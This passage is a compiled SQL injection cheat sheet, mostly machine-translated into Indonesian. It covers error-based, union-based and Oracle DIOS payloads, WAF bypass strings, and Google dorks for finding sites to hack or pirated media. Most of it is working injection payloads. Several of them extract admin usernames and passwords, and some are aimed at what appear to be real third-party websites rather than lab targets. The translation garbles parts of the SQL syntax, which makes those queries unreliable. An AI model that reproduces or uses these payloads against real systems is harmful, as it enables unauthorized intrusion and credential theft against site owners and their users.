3195Target: vulnweb.com: Ini adalah kerangka kerja praktik dari sebuah perusahaan bernama Acunetix.
3196
3197Ia memiliki semua praktek serangan teknologi MY-SQL dan MS-SQL.
3198
3199Langkah 1: Dapatkan metode GET apa pun di URL situs web. I.e Kita harus mencari SOmethoing = Sesuatu.
3200http://testasp.vulnweb.com/showforum.asp?id=0
3201
3202Langkah 2: Periksa penanganan pengecualian.
3203http://testasp.vulnweb.com/showforum.asp?id=0 '
3204
3205Langkah 3: Periksa kondisi yang diperlukan untuk serangan lebih lanjut.
3206http://testasp.vulnweb.com/showforum.asp?id=0 dan 1 = 0;
3207
3208NOte: Error Based Injection bekerja pada aturan LIFO. Terakhir di First out.
3209
3210Sebagai contoh: Jika kita memiliki database dengan tabel seperti berikut
3211utas -> 1
3212guru-> 2
3213kelas-> 3
3214biaya-> 4
3215pengguna-> 5
3216
3217Langkah 4: http://testasp.vulnweb.com/showforum.asp?id=0 dan
32181 = convert (int, (pilih top 1 table_name dari information_schema.tables));
3219
3220Punya Tabel: 'utas' X
3221http://testasp.vulnweb.com/showforum.asp?id=0 dan
32221 = convert (int, (pilih top 1 table_name dari information_schema.tables di mana table_name tidak di ('thread')));
3223
3224Target: 'pengguna'
3225
3226Langkah 5: Dapatkan kolom masing-masing tabel pengguna
3227http://testasp.vulnweb.com/showforum.asp?id=0 dan
32281 = convert (int, (pilih top 1 column_name dari information_schema.columns di mana table_name = 'users' dan column_name tidak dalam ('uname')));
3229
3230Kolom Target: uname, upass
3231
3232Langkah 6: Dapatkan yang tidak benar dan upass
3233http://testasp.vulnweb.com/showforum.asp?id=0 dan
32341 = mengkonversi (int, (pilih top 1 upass dari pengguna));
3235
3236uname: admin
3237upass: tidak ada
3238
3239
3240
3241Pengantar Firewall Aplikasi Web dan IDS dan IPS
3242
3243www.iamrahultyagi.in officialrahultyagi.in
3244-------------------------------------------------- ----------------
3245Firewall Aplikasi Web: Ketika pemilik situs web menyebarkan perangkat lunak aplikasi yang berisi semua jenis database serangan di dalamnya dan menyaring permintaan yang digunakan oleh vistor, maka kita dapat mengatakan bahwa aplikasi yang digunakan di situs web adalah firewall aplikasi web.
3246
3247Jenis WAF
3248---------------------
32491. Perangkat Lunak WAF: Ini adalah teknologi firewall yang seperti aplikasi perangkat lunak yang dapat diinstal pada server web dan karenanya dapat digunakan untuk mengisi konten yang diminta.
3250
3251Linux: Keamanan Mod: Gratis | Dibayar: .php
3252Windows: Dot Defender: Dibayar:. asp aspx
3253
32542. Hardware WAF: Ini adalah sistem UTM (Unified Threat Management Systems) yaitu berisi Antivirus + Firewall + IDS dan IPS + Web Filteration untuk Konten dll dll.
3255
3256Keamanan Mod: Mod Security datang untuk menggambarkan pada awal tahun 2008 ketika peretas berada di puncak dan merusak situs web di seluruh dunia. Ini adalah era ketika ada banyak firewall berbayar tetapi tidak ada solusi untuk organisasi tingkat menengah.
3257
3258Mod Security datang dan memberikan sedikit harapan kepada pemilik situs web bahwa mereka akan melindungi dari peretas.
3259
3260Masalah
3261--------
32621. Database serangan terbatas.
32632. Sumber terbuka tetapi kekurangan dana.
3264
3265OWASP TOP 10 Serangan yang mereka lakukan terbuka. Panggilan ke Peretas.
3266
3267Cara Memasang Keamanan Mod di Ubuntu
3268--------------------------------------
3269$ sudo apt-get install libapache2-mod-security
3270$ sudo a2enmod mod-security
3271$ sudo /etc/init.d/apache2 paksa-ulang
3272
3273Memahami kerja WAF
3274--------------------------------
3275Setiap WAF bekerja pada dua format utama pertama Daftar Putih dan filterisasi Daftar Hitam.
3276
32771. Daftar Putih: Saat kami menyatakan pemilik hanya harus masuk dari suatu IP statis tertentu serta alamat MAC dan nama pengguna dan kata sandi. Oleh karena itu bahkan kata sandi bocor tidak ada yang dapat login situs web kecuali ia tidak berada di IP dan alamat MAC yang sama.
3278
32792. Black List: Ini adalah cara kedua untuk mengamankan situs web maka ia akan memiliki database dari semua serangan non-sense khususnya string based (order by), (union all select) dll. Dll. Apapun permintaan yang membawa jenis ini string dari VISITOR akan disaring oleh daftar hitam dan sebagai respons akan memblokir jika cocok dengan string apa pun dari daftar.
3280
3281Cara Mengonfigurasi Keamanan Mod Anda di Ubuntu Setelah Instalasi
3282-------------------------------------------------- --------------
3283sudo gedit /etc/apache2/sites-available/000-default.conf
3284Setelah membuka file ini yaitu 000-default.conf kita harus mengubah alamat IP dari server atau nama situs web yang lalu lintasnya yang ingin kita saring dari keamanan mod.
3285
3286Memintas Validasi WAF dan Filterasi
3287------------------------------------------
3288
32891. Metode Upper Lower Case
3290
3291union all pilih: UnIoN aLl SeLeCt
3292http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1 'UnIoN SeLeCt 1,2 - + & Kirim = Kirim #
3293
3294Komentar sebaris: / * * /
3295
32962. Inline Executable Comments
3297/ *! UnIoN * / + / *! ALl * / + / *! SeLeCt * /
3298
3299Langkah 1: Dapatkan tabel dari database
3300http://172.16.191.138/dvwa/vulnerabilities/sqli/?id=1 '/ *! UnIoN * / + / *! aLl * / + / *! SeLeCt * / 1,2 - + & Kirim = Kirim #
3301
3302Tabel Target adalah pengguna
3303
3304Langkah 2: dapatkan kolom
3305http://172.16.191.138/dvwa/vulnerabilities/sqli/?id=1 '/ *! UnIoN * / + / *! aLl * / + / *! SeLeCt * / 1, column_name dari information_schema.columns di mana table_name =' pengguna '- + & Kirim = Kirim #
3306
3307Versi Berdasarkan Inline Komentar yang Dapat Dijalankan
3308----------------------------------------
3309/ *! 50000UnIoN * / + / *! 50000aLl * / + / *! 50000SeLeCt * /
3310
3311Langkah 3: http://172.16.191.138/dvwa/vulnerabilities/sqli/?id=1 '/ *! 50000UnIoN * / + / *! 50000aLl * / + / *! 50000SeLeCt * / 1, column_name dari information_schema.columns di mana table_name = 'users' - + & Submit = Kirim #
3312
3313NOte: Lakukan hal yang sama dengan semua kata query dan lanjutkan dengan serangan. Jika Anda butuh bantuan, kunjungi www.iamrahultyagi.in atau officialrahultyagi.blogspot.in
3314
3315MYSQL
33165.00.00 -> 50000
33174,00,00 -> 40000
33183,00,00 -> 30000
33192,00,00 -> 20000
33201,00,00 -> 10.000
3321
3322©
3323
3324-rkx
3325
3326Penggunaan Kueri Keamanan Tinggi
3327
33281'order oleh 1 #
33291 'union pilih 1,2 #
33301 'union pilih 1, database () #
3331
3332atau 1 = 1 union pilih null, table_name dari information_schema.tables
3333
3334atau 1 = 1 union pilih null, column_name dari information_schema.columns
3335
3336atau 1 = 1 union memilih pengguna, kata sandi dari pengguna
3337
3338Error Base Penggunaan query ganda
3339Sebuah. Pernyataan Pilih Yang Digunakan Memiliki Jumlah Kolom yang Berbeda.
3340b. Kolom Tidak Diketahui 1 atau tidak ada kolom sama sekali (di halaman web dan sumber halaman)
3341c. Kesalahan # 1604
3342
3343Tampilkan Versi
3344atau 1 grup dengan concat_ws (0x3a, versi (), floor (rand (0) * 2)) memiliki min (0) atau 1
3345
3346Tampilkan Database
3347dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (database () sebagai char), 0x7e)) dari information_schema.tables di mana table_schema = database () limit 0,1), floor ( rand (0) * 2)) x dari grup information_schema.tables dengan x) a)
3348
3349Tampilkan tabel
3350dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (table_name sebagai char), 0x7e)) dari information_schema.tables di mana table_schema = database () limit 0,1), floor (rand ( 0) * 2)) x dari grup information_schema.tables dengan x) a)
3351
3352Tampilkan kolom
3353dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (column_name sebagai char), 0x7e)) dari information_schema.columns di mana table_name = 0xTable limit 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a)
3354
3355
3356Buang data dari kolom
3357dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (concat (COLUMN_NAME, 0x7e, COLUMN_NAME) sebagai char), 0x7e)) dari Databasename.TABLENAME limit 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a)
3358
3359-------------------------------------------------- ----------
3360-------------------------------------------------- ----------
3361http: // localhost / sqli-labs-master / Less-5 /? id = 1'and (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (column_name sebagai char), 0x7e) ) dari information_schema.columns di mana table_name = 0x7573657273 dan table_schema = database () limit 2,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) - +
3362
3363Mendapatkan
3364
3365http: // localhost / sqli-labs-master / Less-5 /? id = 1'and (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (concat (nama pengguna, 0x7e, kata sandi ) sebagai char), 0x7e)) dari batas security.users 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a)
3366- +
3367
3368-------------------------------------------------
3369-------------------------------------------------- -
3370
3371Basis Kesalahan
3372dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (database () sebagai char), 0x7e)) dari information_schema.tables di mana table_schema = database () limit 0,1), floor ( rand (0) * 2)) x dari grup information_schema.tables dengan x) a)
3373
3374Error Base Double Query
3375
3376Tampilkan Versi
3377dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (0x7e, 0x27, cast (versi () sebagai char), 0x27,0x7e)) dari limit information_schema.tables 0,1), floor ( rand (0) * 2)) x dari grup information_schema.tables dengan x) a) dan 1 = 1
3378
3379Tampilkan Database
3380dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih (PILIH concat yang berbeda (0x7e, 0x27, cast (schema_name sebagai char), 0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) dari information_schema .tables limit 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) dan 1 = 1
3381
3382Tampilkan Tabel dari basis data
3383dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih (PILIH concat yang berbeda (0x7e, 0x27, cast (table_name sebagai char), 0x27,0x7e) FROM information_schema.tables Dimana table_schema = 0xDatabase_Name LIMIT 0,1 )) dari batas information_schema.tables 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) dan 1 = 1
3384
3385Tampilkan Kolom dari tabel
3386dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih (PILIH concat yang berbeda (0x7e, 0x27, cast (column_name sebagai char), 0x27,0x7e) FROM information_schema.columns Di mana table_schema = 0xDatabase_name DAN table_name = 0xTable_name LIMIT 0,1)) dari batas information_schema.tables 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) dan 1 = 1
3387
3388Dump Data dari kolom
3389dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih (pilih concat (0x7e, 0x27, cast (table_name.column_name sebagai char), 0x27,0x7e) DARI `security`.table_name LIMIT 0,1) ) dari batas information_schema.tables 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) dan 1 = 1
3390-------------------------------------------------- ------
3391
3392Dump in one Shot (Database, Tabel, Kolom)
3393(pilih (@x) dari (pilih (@x: = 0x00), (pilih (0) dari (information_schema.columns) di mana (table_schema! = 0x696e666f726d6174696f6e5f736368656d61) dan (0x00) dalam (@x: = / *! 50000concat * / (@ x, 0x3c62723e, table_schema, 0x272d2d3e27, table_name, 0x272d2d3e27, column_name)))) x)
3394
3395(pilih (@) dari (pilih (@: = 0x00), (pilih (@) dari tbl_admin_info di mana (@) dalam (@: = / *! 50000concat * / (@, user_name, 0x3a, kata sandi)))) a )
3396-------------------------------------------------- ----
3397
3398jika concat block gunakan ganti fungsi
3399
3400ganti (REPLACE (ganti (0x5b215d, 0x5b, versi ()), 0x21, database ()), 0x5d, usâ € ‹er ())
3401
3402Function ByPassing
3403
3404* unhex(hex(value))
3405
3406* cast(value as char)
3407
3408* uncompress(compress(version()))
3409
3410* cast(version() as char)
3411
3412* aes_decrypt(aes_encrypt(version(),1),1)
3413
3414* binary(version())
3415
3416* convert(value using ascii)
3417
3418Mengapa Kami menggunakan 50000,12345,00000 dalam / *! * /?
3419
3420Frnds Sekarang saya ingin berbagi sesuatu yang menarik 4u yang merupakan bagian dari SQLI. Hanya 4 pemula.
3421Master bros sudah tahu ini yang harus saya bagikan di sini
3422
3423Topik: Mengapa kami menggunakan 50000,00000,12345 dalam / *! * /?
3424
3425Pendatang baru saya menggunakan semua / *! 12345 * / seperti dat 4 yang melewati WAF. Apakah Anda tahu logika di balik ini mengapa kita menggunakan 12345? Hari ini m memberitahu Anda arti sebenarnya dari ini Tapi pertama setelah membaca komentar ini yang Anda ketahui sebelum arti dari penggunaan dat 12345.00000,50000
3426
3427Jadi, sekarang dengarkan baik-baik
3428
3429Sebenarnya kita menggunakan 12345 bcuj ketika kita menulis ini menjalankan versi MySQL upto 5. Berarti jika versi mysql Anda adalah upto 5 maka Anda dapat menggunakan 00000,12345,50000 atau bahkan Anda dapat menggunakan 56000 tetapi jika versi mysql adalah 5,6 sesuatu. Jadi itu berarti nomor 12345 terkait dengan versi mysql
3430
343112345 berarti => 1.23.4500000 berarti => 0.00.0050000 berarti => 5.00.0056000 berarti => 5.60.00
3432
3433Baca saja semuanya karena jika Anda tidak melakukannya, Anda tidak akan mengerti ini
3434kode dan bagaimana cara kerjanya!
3435
3436Dorks:
3437
3438inurl: "view.asp? page =" intext: "plymouth"
3439
3440Ok apa kode ini?
3441Jadi ini adalah sekolah-sekolah universitas yang dapat diretas dengan sekolah-sekolah universitas dork ini.
3442
3443inurl: "shoutbox.php" intext: "skrip"
3444
3445dengan kode ini Anda dapat meretas shoutbox atau menemukan skrip
3446
3447
3448inurl: "index.php? act =" rapidleech
3449
3450Kode ini akan menemukan situs rapidleecher dengan sangat cepat.
3451
3452inurl: "index.php? act = idx"
3453
3454Kode ini akan menemukan forum ipb dengan cepat untuk diretas
3455
3456inurl: "Photoshop.aspx" "tutorial"
3457
3458Kode ini akan menemukan tutorial photoshop
3459
3460inurl: ftp: // situs ftp: .com
3461
3462Kode ini akan menemukan server ftp apa saja dan membasmi situs yang dilindungi.
3463
3464allinurl: user_index.jsp
3465
3466Kode ini akan menemukan hosting gratis apa pun
3467
3468didukung oleh vbulletin game 3.8.4 inurl: member.php? u = 1
3469
3470Kode ini akan menemukan forum permainan vbulletin dan halaman admin.
3471
3472didukung oleh vbulletin 4.0.3 Informasi Debug
3473
3474Kode ini akan menampilkan semua kode dan informasi kode vbulletin forum
3475dan bugnya Anda rooting ke dalamnya.
3476
3477didukung oleh vbulletin "warez"
3478
3479Kode ini akan menemukan forum warez apa pun.
3480
3481video ke mp3 konverter intext online: "mp3" -intis: "Kualitas Tinggi"
3482
3483Dengan kode ini Anda dapat mengunduh mp3 dari youtube dengan sangat cepat.
3484
3485intext: "Peringatan: mysql_fetch_array ()"
3486
3487Dengan kode ini Anda akan menemukan situs vulnarable dan meretasnya.
3488
3489inurl: radioandtv.php
3490
3491Kode ini akan menampilkan semua torrent stasiun radio tersembunyi.
3492
3493inurl: "postingan.php? mode = smilies" "phpbb"
3494
3495Dengan kode ini Anda akan dapat meretas forum phpbb dan memasukkan xss ke dalam forum.
3496
3497allinurl: alat / spider-view.php
3498
3499Dengan kode ini Anda dapat menemukan tautan situs dengan sangat cepat.
3500
3501embed src = ". mp3" type = audio / mpeg
3502
3503Kode injeksi Html untuk menemukan situs rahasia dengan kode html mp3 embed
3504Anda akan melihatnya bahkan di google.
3505
3506"didukung oleh vbulletin" + "akun dump"
3507
3508Dengan kode ini Anda akan dapat menemukan kata sandi
3509untuk situs apa pun, forum bukan untuk pornografi.
3510
3511allinurl: "buku tamu / smileys.php"
3512inurl: "smileys.php" + "berbicara"
3513allinurl: smiliehelp.php
3514
3515Berbicara smilies.
3516
3517"intitle: index of" admin / FCKeditor / _samples / html
3518
3519Dengan kode ini Anda akan dapat menemukan fck server html
3520editor dan meretasnya.
3521
3522burung hantu kota kunang-kunang + "instrumental"
3523
3524Dengan kode ini Anda akan dapat mp3 instrumental dan mengubah ini
3525burung hantu kota kunang-kunang
3526
3527HTTP / 1.1 :: Mozilla / 5.0 (Windows; U; Windows NT 5.1; en-US; rv: 1.9.2.3)
3528access_log
3529
3530dengan kode ini Anda akan dapat meretas akses situs
3531log dan lihat semua informasi.
3532
3533"google scanner sql" + "php"
3534
3535Google sql injection online meretas situs-situs rentan, forum
3536dan menemukan situs-situs yang rentan sangat mudah.
3537
3538situs: youtube.com *@gmail.com
3539
3540Ini akan menemukan youtube atau email situs apa pun.
3541
3542allinurl: html_colors.html
3543
3544Ini akan menemukan kode grafik html sangat cepat.
3545
3546torrent pribadi + "buka daftar"
3547
3548Ini akan menemukan torrent pribadi yang terbuka untuk didaftarkan.
3549
3550
3551hotfile + mediafire + "http: //" + "rar" horor 2010 dvdrip,
3552(hotfile | mediafire) .rar 2010 horor dvdrip
3553
3554Ini akan menemukan situs-situs rahasia dengan film dvdrip hanya mengubah horor.
3555
3556dvdrip 400mb "2010"
3557
3558Ini akan menemukan film ripping dvdrip dalam 400mb dan terbaru.
3559
3560sql dork bank injeksi
3561
3562Ini akan menemukan bank dorks untuk meretas google.
3563
3564inurl: archive / index.php "visual basic"
3565
3566-4LPH4
3567
3568POST METHOD
3569
3570------------
3571
3572http://mosii.gametrailers.com/getmediainfo4.php?mid=47330 and false UNION SELECT 1,@@version,333,4444,5,6,7,8,0,10,11,12,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
3573
3574http://sharemobile.ro/index.php
3575
3576&login=login&password=xxxxxxxxxx&username=asdasdasd' and false union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 %23
3577
3578http://www.articlemarketingrobot.com/db/select.php
3579
3580sql=select/**/*/**/from/**/_articlequeue/**/where/**/1=2/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11/**/%23&dbid=a6b65df1-14b4-47a0-98f7-c7e420deda3f&cb=ZZCZXV36
3581
3582
3583~h
3584
3585-----------------------------------------------
3586UNION SELECT BASED
3587
3588-------------------------------------------------------------------------
3589
3590http://127.0.0.1/defcamp/0_o/index.php?id=2%27+and+1=0+union+select+1,2,3,4,5,(SELECT-!!-1||! !N'1'|2),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
3591
3592http://www.communityinclusion.org/staff.php?staff_id=1+and+1=2+UNION+SELECT+1,2,3,4,5,6;%00
3593
3594http://poze.exn.ro/poze.php?id=202&poze=vedete"+and+false+union+all+select+1,2,version(),4,5,6+and+"1"="1
3595
3596test.ru/test.php?id=-40+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(members)where(0x00)in(@x:=concat(@x,0x3c62723e,mail,0x3a,pwd))))x),3,4,5,6,7,8,9--+
3597
3598http://www.marinaplast.com/page.php?id=13 div 0 union select 1,2,3,4,5
3599
3600mysite.com/index.php?id=-1+UNION+SELECT+1,convert(@@version using latin1),3,4,5--
3601
3602mysite.com/index.php?id=-1+union+select+1,group_concat(table_name),3+from+information_schema.tables+--+
3603
3604mysite.com/index.php?id=-1+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_name>'mytable'+--+
3605
3606mysite.com/index.php?id=-1+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_name>0x6d797461626c65+--+
3607
3608mysite.com/index.php?id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5+from+0x6578616d706c656462322e61646d696e6973747261746f7273--
3609
3610mysite.com/index.php?id=-1'+union+select+concat(name,0x3a,password)+from+user+where+id=1+--+
3611
3612mysite.com/index.php?id=9086 UNION /*!SELECt*/ 1,2,grouP_ConCat(column_name),4,5,6,7,8 from /*!information_schema*/.columns where table_schema=database()--
3613
3614mysite.com/index.php?catid=-1 UNION SELECT 1,concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3,4--
3615
3616mysite.com/index.php?catid=1 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())--
3617
3618mysite.com/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database()
3619
3620mysite.com/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database()
3621
3622mysite.com/index.php?a=newsdetail&id=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database()
3623
3624mysite.com/index.php?a=newsdetail&id=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database()
3625
3626mysite.com/index.php?a=newsdetail&id=-1/*!AND*/1=1+UNiOn+ALl+SelECt+1,/**/2,/**/3,/**/4,/**/5,/**/6,/**/7,/**/8,/**/9/**/limit/**/1,2
3627
3628+and+1=0+union+select+ sql_no_cache +1,2,3,4,5
3629
3630http://www.microage-bathurst.ca/services.php?id=-7+union+select+1,hex(group_concat(table_name)),3,4+from+information_schema.tables+where+table_rows>0--
3631
3632http://www.imsports.msu.edu/clubs/clubDisp.php?id=-71+union+select+1,GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NAME)+SEPARATOR+0x3C62723E),3,4,5,6,7,8,9,10,11+from+information_schema.columns+where+column_name+like+0x257061737325+or+column_name+like+0x25702577256425--+
3633
3634http://web.riss.ru/cgi-bin/riss.cgi?action=news_show&lang=concat_ws(0x3a,user(),database(),version())+FROM+riss_news+LIMIT+1--+&id=-1+union+select+1,2,3
3635
3636http://www.wbdg.org/ccb/browse_org.php?o=70+and+1=10+union+select+111111111113371111111111,2--
3637
3638concat(@i:=0x00,@o:=0xd0a,benchmark(61,@o:=CONCAT(@o,0xd0a,(SELECT+concat(table_schema,0x2E,@i:=table_name)+FROM+information_schema.tables+WHERE+table_name>@i+order+by+table_name+LIMIT+1))),@o)
3639
3640~Ph.h4rh4r
3641
3642List of HTTP status codes
3643
3644400 ===> (Bad request)
3645401 ===> (Authorization required)
3646402 ===> (Payment required)
3647403 ===> (Forbidden)
3648404 ===> (Not found)
3649405 ===> (Method not allowed)
3650406 ===> (Not acceptable)
3651407 ===> (Proxy authentication required)
3652408 ===> (Request timeout)
3653409 ===> (Conflict)
3654410 ===> (Gone)
3655411 ===> (Length required)
3656412 ===> (Precondition failed)
3657413 ===> (Request entity too large)
3658414 ===> (Request URI too large)
3659415 ===> (Unsupported media type)
3660416 ===> (Request range not satisfiable)
3661417 ===> (Expectation failed)
3662422 ===> (Unprocessable entity)
3663423 ===> (Locked)
3664424 ===> (Failed dependency)
3665500 ===> (Internal server error)
3666501 ===> (Not Implemented)
3667502 ===> (Bad gateway)
3668503 ===> (Service unavailable)
3669504 ===> (Gateway timeout)
3670505 ===> (HTTP version not supported)
3671506 ===> (Variant also negotiates)
3672507 ===> (Insufficient storage)
3673510 ===> (Not extended)
3674
3675~{Injection type}~
3676-----------------------------------------------
3677HTML Injection - Reflected (GET)
3678HTML Injection - Reflected (POST)
3679HTML Injection - Reflected (Current URL)
3680HTML Injection - Stored (Blog)
3681iFrame Injection
3682LDAP Injection (Search)
3683Mail Header Injection (SMTP)
3684OS Command Injection
3685OS Command Injection - Blind
3686PHP Code Injection
3687Server-Side Includes (SSI) Injection
3688SQL Injection (GET/Search)
3689SQL Injection (GET/Select)
3690SQL Injection (POST/Search)
3691SQL Injection (POST/Select)
3692SQL Injection (AJAX/JSON/jQuery)
3693SQL Injection (CAPTCHA)
3694SQL Injection (Login Form/Hero)
3695SQL Injection (Login Form/User)
3696SQL Injection (SQLite)
3697SQL Injection (Drupal)
3698SQL Injection - Stored (Blog)
3699SQL Injection - Stored (SQLite)
3700SQL Injection - Stored (User-Agent)
3701SQL Injection - Stored (XML)
3702SQL Injection - Blind - Boolean-Based
3703SQL Injection - Blind - Time-Based
3704SQL Injection - Blind (SQLite)
3705SQL Injection - Blind (Web Services/SOAP)
3706XML/XPath Injection (Login Form)
3707XML/XPath Injection (Search)
3708
3709Hard WAF Bypass :)
3710
3711The Methods
3712.
3713id=1.unioN/**/distinct%20%73eleCt""a
3714id=1%.0unioN/**/distinct%20%73eleCt+-!~
3715id=1%""unioN/**/distinct%20%73eleCt@$%
3716id=1%''unioN/**/distinct%20%73eleCt@%C0%
3717id=1-.0unioN/**/distinct%20%73eleCt@%C0/
3718id=1=\NunioN/**/distinct%20%73eleCt@%FF|
3719id=1<0.unioN/**/distinct%20%73eleCt@=
3720id=1>0.unioN/**/distinct%20%73eleCt~.
3721id=1e0unioN/**/distinct%20%73eleCt""$
3722id=1^0.unioN/**/distinct%20%73eleCt!~
3723id=1|""unioN/**/distinct%20%73eleCt\N$
3724id=1|''unioN/**/distinct%20%73eleCt\N%FF
3725id=1|.0unioN/**/distinct%20%73eleCt!@
3726id=1|\NunioN/**/distinct%20%73eleCt""/
3727
3728Source: https://pastebin.com/qzNp6zha
3729
3730-Credits.
3731
3732Oracle SQL Injection dan DIOS Query
3733
3734Dalam Nama ALLAH Yang Maha Pengasih dan Penyayang
3735
3736Setelah mendapatkan banyak permintaan untuk menambahkan DIOS dan tutorial Injeksi ralated database lainnya pada Securityidiots. Di sini kita bangun dengan Oracle Based SQL Injection dan DIOS tutorial
3737
3738Berikut adalah dasar-dasar Oracle Union Based Injection yang dapat Anda gunakan untuk menyuntikkan situs berbasis oracle Union Based Oracle Injection
3739
3740Saya harap membaca Union Based Oracle Injection di atas sekarang Anda tahu cara menyuntikkan situs berbasis oracle, sekarang kita akan menyuntikkan "http://demosite.com/page.php?id=1" di tutorial kami. Mari kita lihat apakah masukan di bawah ini memberi kita kesalahan. Sebelum kita mulai menonton video dasar ini yang berisi bagaimana menggunakan beberapa pertanyaan di bawah ini, maka Anda dapat membaca tutorial yang memberikan penjelasan lebih lanjut dan beberapa contoh lain dari DIOS oracle dan injeksi.
3741
3742http://demosite.com/page.php?id=1 '
3743Sekarang jika kita memiliki kesalahan memungkinkan menyeimbangkan permintaan.
3744http://demosite.com/page.php?id=1 'pesanan oleh 1--
3745Tidak Ada Kesalahan
3746http://demosite.com/page.php?id=1 'pesanan sebesar 8--
3747Tidak Ada Kesalahan
3748http://demosite.com/page.php?id=1 'pesanan sebesar 9--
3749Kesalahan
3750Sekarang kita tahu 8 adalah kolom terakhir yang berfungsi, jadi sekarang kita bisa mencoba serikat pekerja.
3751http://demosite.com/page.php?id=1'and 0 = 1 union pilih 111,222,333,444,555,666,777,888--
3752Jika Anda mendapatkan beberapa kesalahan, maka cobalah
3753http://demosite.com/page.php?id=1'and 0 = 1 union pilih NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--
3754dan temukan kolom yang rentan secara manual, tetapi anggaplah itu juga tidak berhasil, maka cobalah ini.
3755http://demosite.com/page.php?id=1'and 0 = 1 union pilih NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL dari dual--
3756Semoga mencampur salah satu trik di atas dapat berhasil.
3757Anggaplah ketiga adalah kolom rentan, yang dicetak di layar. Mari mulai mengekstraksi data melalui kolom ketiga, pertama-tama kita akan mengekstrak versi database.
3758Untuk mendapatkan versi yang kami gunakan (pilih spanduk dari v $ version di mana rownum = 1)
3759http://demosite.com/page.php?id=1'and 0 = 1 union pilih NULL, NULL, (pilih banner dari v $ version di mana rownum = 1), NULL, NULL, NULL, NULL, NULL--
3760Sekarang mari dapatkan database saat ini menggunakan SYS.DATABASE_NAME.
3761http://demosite.com/page.php?id=1'and 0 = 1 union pilih NULL, NULL, SYS.DATABASE_NAME, NULL, NULL, NULL, NULL, NULL--
3762Sekarang sisa bagian yang akan kita lakukan menggunakan DIOS (Dump dalam satu tembakan) untuk Oracle. Tidak seperti DIOS Oracle DOS lain yang sederhana di mana kita hanya menggunakan fungsi wm_concat untuk mengekstrak data dari database.
3763http://demosite.com/page.php?id=1'and 0 = 1 union pilih NULL, NULL, (PILIH ganti (wm_concat ('<li>' || table_name), ',', '') FROM all_table), NULL, NULL, NULL, NULL, NULL--
3764Query di atas akan memberi Anda semua tabel, sekarang mari kita dapatkan kolom untuk tabel, tapi itu tidak semuanya lebih dari apa yang dapat Anda lakukan: D. Karena wm_concat terbatas dalam output, kami tidak dapat menyebutnya DIOS lengkap, jadi ya kami akan segera bekerja pada beberapa versi lain untuk DIOS Oracle, tetapi untuk sekarang di sini ada beberapa cara lain yang dapat Anda coba.
3765http://www.technoriunite.it/pages.php?p=cut-linear ') dan 1 = 0 union pilih null,' "> '|| (pilih LISTAGG (table_name,' <li> ') dalam grup ( ORDER BY table_name) dari all_tables) || '<! -', NULL, NULL dari dual - & lang = it
3766
3767http://www.beaconhouse.edu.pk/cms_main_career.php?id=9&subpg=1&pjobid=-22050 dan 0 = 1 UNION + SELECT NULL, (pilih wm_concat ('<li>' || table_name || ':' || column_name) from (pilih rownum as rnum, table_name, column_name dari all_tab_columns urutan oleh table_name desc) shell di mana rnum <120) || '<! -', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL dari dual--
3768
3769http://www.technoriunite.it/pages.php?p=cut-linear ') dan 1 = 0 union pilih null,' "> '|| (pilih wm_concat (' <li> '|| table_name ||' : '|| column_name) from (pilih rownum as rnum, table_name, column_name dari all_tab_columns order oleh table_name desc) shell di mana rnum <120) ||' <! - ', NULL, NULL dari dual - & lang = it
3770Itu semua untuk saat ini, sampai jumpa lagi dengan tutorial kami berikutnya: D
3771
3772Diko rin naget ke hahaha. share ko nalang: D
3773
3774Sumber: SecurityIdiots.com
3775
3776
3777Bypass 404 :)
3778
3779bypass1: order by x,x-- -
3780bypass2: union select x,x-- -
3781bypass3: =-x' UNION /*!SELECT*/ x,x-- -
3782bypass4: x,x,CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- -
